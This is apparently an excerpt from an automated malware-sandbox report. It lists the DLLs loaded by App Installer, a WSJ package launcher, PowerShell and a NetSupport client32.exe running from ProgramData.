                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: vcruntime140.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: vcruntime140.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: twinapi.appcore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: rometadata.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.storage.applicationdata.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: appcontracts.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.applicationmodel.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: cdprt.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: cdp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: dsreg.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: capauthz.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: ondemandbrokerclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: psfruntime64.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: daxexec.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: fltlib.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: container.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: capauthz.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: capauthz.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: capauthz.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: daxexec.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fltlib.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: container.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: capauthz.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: pcicl32.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: shfolder.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: pcichek.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: pcicapi.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: mpr.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: version.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: winmm.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: wsock32.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: netapi32.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: wininet.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: msvcr100.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: msvcr100.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: netutils.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: samcli.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: dbghelp.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: wtsapi32.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: dbgcore.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: uxtheme.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: nsmtrace.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: nslsp.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: devobj.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: msasn1.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: pcihooks.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: wbemcomn.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: textshaping.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: winsta.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: amsi.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: userenv.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: profapi.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: riched32.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: riched20.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: usp10.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: msls31.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: windows.storage.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: wldp.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: pciinv.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: iertutil.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: sspicli.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: firewallapi.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: dnsapi.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: iphlpapi.dll
